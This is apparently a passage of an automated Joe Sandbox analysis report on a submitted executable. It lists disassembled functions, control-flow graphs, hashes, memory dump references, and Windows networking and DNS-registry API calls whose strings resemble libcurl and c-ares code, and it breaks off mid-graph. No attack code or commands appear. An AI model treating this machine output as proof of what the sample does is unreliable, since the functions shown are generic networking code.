                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: a4433eefc3aadd6f207d4de73380786d8510255329a9a84ce11daf390f393940
                                                            • Instruction ID: bd8581fbb3c9452ef985cc897fb3dd0d56ad105803c19497d2d0bb4abdfeec4e
                                                            • Opcode Fuzzy Hash: a4433eefc3aadd6f207d4de73380786d8510255329a9a84ce11daf390f393940
                                                            • Instruction Fuzzy Hash: 63E1E4B49193059FCB40EF68D985AAEBBF5EF48304F00886DE898D7350E7749A85CF52
                                                            Function 006D05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1528 6d05b0-6d05b7 1529 6d05bd-6d05d4 1528->1529 1530 6d07ee 1528->1530 1531 6d05da-6d05e6 1529->1531 1532 6d07e7-6d07ed 1529->1532 1531->1532 1533 6d05ec-6d05f0 1531->1533 1532->1530 1534 6d07c7-6d07cc 1533->1534 1535 6d05f6-6d0620 call 6d7350 call 6c70b0 1533->1535 1534->1532 1540 6d066a-6d068c call 6fdec0 1535->1540 1541 6d0622-6d0624 1535->1541 1546 6d07d6-6d07e3 call 6d7380 1540->1546 1547 6d0692-6d06a0 1540->1547 1543 6d0630-6d0655 call 6c70d0 call 6d03c0 call 6d7450 1541->1543 1572 6d07ce 1543->1572 1573 6d065b-6d0668 call 6c70e0 1543->1573 1546->1532 1549 6d06f4-6d06f6 1547->1549 1550 6d06a2-6d06a4 1547->1550 1555 6d06fc-6d06fe 1549->1555 1556 6d07ef-6d082b call 6d3000 1549->1556 1553 6d06b0-6d06e4 call 6d73b0 1550->1553 1553->1546 1571 6d06ea-6d06ee 1553->1571 1561 6d072c-6d0754 1555->1561 1569 6d0a2f-6d0a35 1556->1569 1570 6d0831-6d0837 1556->1570 1562 6d075f-6d078b 1561->1562 1563 6d0756-6d075b 1561->1563 1584 6d0791-6d0796 1562->1584 1585 6d0700-6d0703 1562->1585 1567 6d075d 1563->1567 1568 6d0707-6d0719 WSAEventSelect 1563->1568 1574 6d0723-6d0726 1567->1574 1568->1546 1581 6d071f 1568->1581 1579 6d0a3c-6d0a52 1569->1579 1580 6d0a37-6d0a3a 1569->1580 1576 6d0839-6d084c call 6d6fa0 1570->1576 1577 6d0861-6d087e 1570->1577 1571->1553 1578 6d06f0 1571->1578 1572->1546 1573->1540 1573->1543 1574->1556 1574->1561 1594 6d0a9c-6d0aa4 1576->1594 1595 6d0852 1576->1595 1596 6d0882-6d088d 1577->1596 1578->1549 1579->1546 1587 6d0a58-6d0a81 call 6d2f10 1579->1587 1580->1579 1581->1574 1584->1585 1589 6d079c-6d07c2 call 6c76a0 1584->1589 1585->1568 1587->1546 1597 6d0a87-6d0a97 call 6d6df0 1587->1597 1589->1585 1594->1546 1595->1577 1599 6d0854-6d085f 1595->1599 1600 6d0970-6d0975 1596->1600 1601 6d0893-6d08b1 1596->1601 1597->1546 1599->1596 1604 6d0a19-6d0a2c 1600->1604 1605 6d097b-6d0989 call 6c70b0 1600->1605 1602 6d08c8-6d08f7 1601->1602 1611 6d08fd-6d0925 1602->1611 1612 6d08f9-6d08fb 1602->1612 1604->1569 1605->1604 1613 6d098f-6d099e 1605->1613 1614 6d0928-6d093f 1611->1614 1612->1614 1615 6d09b0-6d09c1 call 6c70d0 1613->1615 1621 6d0945-6d096b 1614->1621 1622 6d08b3-6d08c2 1614->1622 1619 6d09a0-6d09ae call 6c70e0 1615->1619 1620 6d09c3-6d09c7 1615->1620 1619->1604 1619->1615 1624 6d09e8-6d0a03 WSAEnumNetworkEvents 1620->1624 1621->1622 1622->1600 1622->1602 1626 6d0a05-6d0a17 1624->1626 1627 6d09d0-6d09e6 WSAEventSelect 1624->1627 1626->1627 1627->1619 1627->1624
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,?), ref: 006D0711
                                                            • WSAEventSelect.WS2_32(?,?,00000000), ref: 006D09DC
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 006D09FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: N=l$multi.c
                                                            • API String ID: 2170980988-611598624
                                                            • Opcode ID: 8adfc6710064bac7452b1acfe9d112c8011bd88d0fb0d1d7f7366b2e172092f1
                                                            • Instruction ID: 5ea3bd5dfe59b1acc2cd63519d0364ca13b5b5f68bdae3bfedd90b30861eb645
                                                            • Opcode Fuzzy Hash: 8adfc6710064bac7452b1acfe9d112c8011bd88d0fb0d1d7f7366b2e172092f1
                                                            • Instruction Fuzzy Hash: 16D1AE75A083019BFB10CF64C881BAB77EAFF94344F04482EF98486342E775E945DB56
                                                            Function 0078B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1699 78b180-78b195 1700 78b19b-78b1a2 1699->1700 1701 78b3e0-78b3e7 1699->1701 1702 78b1b0-78b1b9 1700->1702 1702->1702 1703 78b1bb-78b1bd 1702->1703 1703->1701 1704 78b1c3-78b1d0 1703->1704 1706 78b3db 1704->1706 1707 78b1d6-78b1f2 1704->1707 1706->1701 1708 78b229-78b22d 1707->1708 1709 78b3e8-78b417 1708->1709 1710 78b233-78b246 1708->1710 1718 78b41d-78b429 1709->1718 1719 78b582-78b589 1709->1719 1711 78b248-78b24b 1710->1711 1712 78b260-78b264 1710->1712 1713 78b24d-78b256 1711->1713 1714 78b215-78b223 1711->1714 1716 78b269-78b286 call 78af30 1712->1716 1713->1716 1714->1708 1717 78b315-78b33c call a48b00 1714->1717 1727 78b288-78b2a3 call 78b060 1716->1727 1728 78b2f0-78b301 1716->1728 1730 78b3bf-78b3ca 1717->1730 1731 78b342-78b347 1717->1731 1722 78b42b-78b433 call 78b590 1718->1722 1723 78b435-78b44c call 78b590 1718->1723 1722->1723 1735 78b458-78b471 call 78b590 1723->1735 1736 78b44e-78b456 call 78b590 1723->1736 1747 78b2a9-78b2c7 getsockname call 78b020 1727->1747 1748 78b200-78b213 call 78b020 1727->1748 1728->1714 1744 78b307-78b310 1728->1744 1737 78b3cc-78b3d9 1730->1737 1739 78b349-78b358 1731->1739 1740 78b384-78b38f 1731->1740 1757 78b48c-78b4a7 1735->1757 1758 78b473-78b487 1735->1758 1736->1735 1737->1701 1745 78b360-78b382 1739->1745 1740->1730 1746 78b391-78b3a5 1740->1746 1744->1737 1745->1740 1745->1745 1754 78b3b0-78b3bd 1746->1754 1755 78b2cc-78b2dd 1747->1755 1748->1714 1754->1730 1754->1754 1755->1714 1759 78b2e3 1755->1759 1760 78b4a9-78b4b1 call 78b660 1757->1760 1761 78b4b3-78b4cb call 78b660 1757->1761 1758->1719 1759->1744 1760->1761 1766 78b4d9-78b4f5 call 78b660 1761->1766 1767 78b4cd-78b4d5 call 78b660 1761->1767 1772 78b50d-78b52b call 78b770 * 2 1766->1772 1773 78b4f7-78b50b 1766->1773 1767->1766 1772->1719 1778 78b52d-78b531 1772->1778 1773->1719 1779 78b580 1778->1779 1780 78b533-78b53b 1778->1780 1779->1719 1781 78b578-78b57e 1780->1781 1782 78b53d-78b547 1780->1782 1781->1719 1782->1781 1783 78b549-78b54d 1782->1783 1783->1781 1784 78b54f-78b558 1783->1784 1784->1781 1785 78b55a-78b576 call 78b870 * 2 1784->1785 1785->1719 1785->1781
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 0078B2B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            • Opcode ID: a63838f1f2b8f4df61203d7fad6512959b67d0b8288971931b4382e9ea5aaf0f
                                                            • Instruction ID: 669870d7067fa64d925b83f91ec523576e26e8612efed95239231ca37ddc1d95
                                                            • Opcode Fuzzy Hash: a63838f1f2b8f4df61203d7fad6512959b67d0b8288971931b4382e9ea5aaf0f
                                                            • Instruction Fuzzy Hash: 33C17E71684305DFD718EF24C885A6A77E1FF89314F05896CE8498B3A2EB38ED55CB81
                                                            Function 006D6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c27a2e2a75b92b05502ffa3501cf13bc1103e3466f78c74493d709182fe1b022
                                                            • Instruction ID: 6ed4f4280f3ed22aa1d5f8872c7953fbc7ec05cda72823eab4eb794d1fba6432
                                                            • Opcode Fuzzy Hash: c27a2e2a75b92b05502ffa3501cf13bc1103e3466f78c74493d709182fe1b022
                                                            • Instruction Fuzzy Hash: FA91E031A0C3494BD7358A2988807FBB2D6EFC5364F188B2EE898433D4FB759D41D682
                                                            Function 0078A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0077712E,?,?,?,00001001,00000000), ref: 0078A90C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: 6d26067c46d148b4dccd7496c6e9811013c36858b101e3c9852b0c8b9cc6d686
                                                            • Instruction ID: 633683c93cf3d6212bddd60678aa1d3c38a710c368e7d2e8c0993a73a0e94e95
                                                            • Opcode Fuzzy Hash: 6d26067c46d148b4dccd7496c6e9811013c36858b101e3c9852b0c8b9cc6d686
                                                            • Instruction Fuzzy Hash: EBF01D75209348BFE620AE41DC44D7BBBEDEFC9754F05856DF958232119271AE10CBB2
                                                            Function 0077A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0077AA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0077AA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0077AA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0077AAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0077AB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 0077AB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0077AB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0077AC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0077AD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 0077AD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 0077ADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 0077AE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0077AE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0077AE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0077AF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0077AFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0077B072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4217438148-1047472027
                                                            • Opcode ID: 7655e259910316043299c7c79d3dbf5d4422111eb315d9c009a2445d99bdb352
                                                            • Instruction ID: cad6681f6afa896693c8d34cb0297a2cf7816fac0492d2d3167ce1a4ad975370
                                                            • Opcode Fuzzy Hash: 7655e259910316043299c7c79d3dbf5d4422111eb315d9c009a2445d99bdb352
                                                            • Instruction Fuzzy Hash: AB72A1B1604301ABF7209B24DC86B5F77E8AF85744F148828F989D7291E779ED44CB63
                                                            Function 006FA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 006FA832
                                                            Strings
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 006FAD0A
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 006FAE1F
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 006FAE60
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 006FA6CE
                                                            • Local port: %hu, xrefs: 006FAF28
                                                            • Bind to local port %d failed, trying next, xrefs: 006FAFE5
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 006FADAC
                                                            • bind failed with errno %d: %s, xrefs: 006FB080
                                                            • Could not set TCP_NODELAY: %s, xrefs: 006FA871
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 006FA796
                                                            • @, xrefs: 006FAC42
                                                            • cf-socket.c, xrefs: 006FA5CD, 006FA735
                                                            • Trying %s:%d..., xrefs: 006FA7C2, 006FA7DE
                                                            • @, xrefs: 006FA8F4
                                                            • Trying [%s]:%d..., xrefs: 006FA689
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 3405ea2cd25b030e63d7c465a463e67d76aceffab609ba23a8e79be2b7dec9d4
                                                            • Instruction ID: 0275984cfaeeb23e951821a3cee438ac5606281e4a0b37797a9e4ae594ff082d
                                                            • Opcode Fuzzy Hash: 3405ea2cd25b030e63d7c465a463e67d76aceffab609ba23a8e79be2b7dec9d4
                                                            • Instruction Fuzzy Hash: 3D62E2B1504345ABE7208F54C886BFBB7E6BF81314F044929FA8C97392E771A945CB93
                                                            Function 00789740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 949 789740-78975b 950 78975d-789768 call 7878a0 949->950 951 789780-789782 949->951 958 7899bb-7899c0 950->958 959 78976e-789770 950->959 953 789788-7897a0 call a48e00 call 7878a0 951->953 954 789914-78994e call a48b70 RegOpenKeyExA 951->954 953->958 965 7897a6-7897c5 953->965 962 78995a-789992 RegQueryValueExA RegCloseKey call a48b98 954->962 963 789950-789955 954->963 966 789a0c-789a15 958->966 964 789772-78977e 959->964 959->965 977 789997-7899b5 call 7878a0 962->977 963->966 964->953 972 789827-789833 965->972 973 7897c7-7897e0 965->973 978 78985f-789872 call 785ca0 972->978 979 789835-78985c call 77e2b0 * 2 972->979 975 7897e2-7897f3 call a48b50 973->975 976 7897f6-789809 973->976 975->976 976->972 988 78980b-789810 976->988 977->958 977->965 989 789878-78987d call 7877b0 978->989 990 7899f0 978->990 979->978 988->972 994 789812-789822 988->994 998 789882-789889 989->998 993 7899f5-7899fb call 785d00 990->993 1003 7899fe-789a09 993->1003 994->966 998->993 1002 78988f-78989b call 774fe0 998->1002 1002->990 1008 7898a1-7898c3 call a48b50 call 7878a0 1002->1008 1003->966 1013 7898c9-7898db call 77e2d0 1008->1013 1014 7899c2-7899ed call 77e2b0 * 2 1008->1014 1013->1014 1018 7898e1-7898f0 call 77e2d0 1013->1018 1014->990 1018->1014 1024 7898f6-789905 call 7863f0 1018->1024 1029 78990b-78990f 1024->1029 1030 789f66-789f7f call 785d00 1024->1030 1032 789a3f-789a5a call 786740 call 7863f0 1029->1032 1030->1003 1032->1030 1038 